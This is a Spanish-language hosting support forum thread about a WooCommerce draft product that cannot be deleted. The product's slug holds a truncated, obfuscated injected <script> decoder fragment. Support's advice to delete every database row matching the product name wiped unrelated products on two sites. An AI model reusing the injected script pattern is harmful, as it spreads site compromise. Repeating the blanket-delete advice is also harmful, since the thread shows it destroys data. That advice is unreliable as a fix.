Hace años más de 70 productos están en "Borrador", en vista de que recién me pasé a Webempresa, quería eliminarlos.
Lo intenté de 5 en 5, de 10, en 10 y de 20 en 20 y Me lleva a una pantalla que dice: "Error al mover el elemento a la papelera"
Cuando lo inetenté borrar de uno en uno, me di cuenta que habia un producto que generaba error, conociendo esto si pude borrar masivamente todos los demás.
Revisando el slug del producto en edición rápida, veo que me sale esto (No se quien ni cuando lo abrán puesto), no se si tenga que ver:
sueter-cuello-b<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujY__trashed
Intenté editarlo, cambiarle el nombre, el slug, y aunque dice actualizado, el cambio no se efectúa.
Soporte de webempresa me dijo que probara cambiando los valores de PHP, llevándolos al máximo, probé y tampoco funcionó.
Me preocupa que sea un virus o algo, qué puedo hacer?
Contenido solo visible a usuarios registrados
Hola Federico.
Me preocupa que sea un virus
La Web esta limpia:
Contenido solo visible a usuarios registrados
Cuando se realiza un traslado se revisa toda la web y se encuentra algo se limpia en ese momento antes de terminar con el traslado.
Solo te pasa con ese producto ? Puedes indicarnos que producto es ?
Un saludo
Gracias por su respuesta.
Está en "Borrador", se llama:
No lo puedo editar ni eliminar
Hola Federico.
.- Accede a tu cuenta de cPanel -> bases de datos -> phpMyAdmin
.- Selecciona la base de datos que utiliza la aplicación y realiza una copia de seguridad.
.- Selecciona buscar del menu superior:
.- Añade el nombre del producto y selecciona todas las tablas y pulsa en " Continuar "
.- Selecciona " Borrar " en todas las tablas donde aparece
Un saludo
Gracias Pepe, te cuento las novedades:
Seguí las instrucciones y borré el producto a través de la base de datos, pero me di cuenta que aparte del que borré, se borraron otros productos que estaban bien y también imágenes de productos que estaban publicados. Pensando si había hecho algo mal, restaure la base de datos.
Lo volví a intentar y pasó lo mismo. Aunque solo tengo 30 productos, averigué lo que faltaba y lo corregí manual.
El detalle que me sorprendió está en que en la otra web que migré y está alojada en este mismo hosting, me di cuenta que estaba en la base de datos este mismo producto, aunque cuando lo buscaba dentro del administrador de wordpress de esa web no lo encontraba, ni en publicados, ni en papelera, ni en borrador. Cuando lo borré por la base de datos, se borraron automáticamente 30 productos de esa web, en esta ocasión preferí restaurar la base de datos que corregir de uno en uno, hasta saber que pueda ser.
Qué debería hacer?
Hola Federeico,
¿Puedes enviarnos algunas capturas sobre este producto que se visualiza en el otro sitio web, de igual forma si es posible indícanos cuál es la otra web que migraste? la tienes en el mismo servidor?
Envíanos más detalles del procedimiento que estás realizando de esta forma podemos verificar con mayor detalle lo que nos comentas
Un Saludo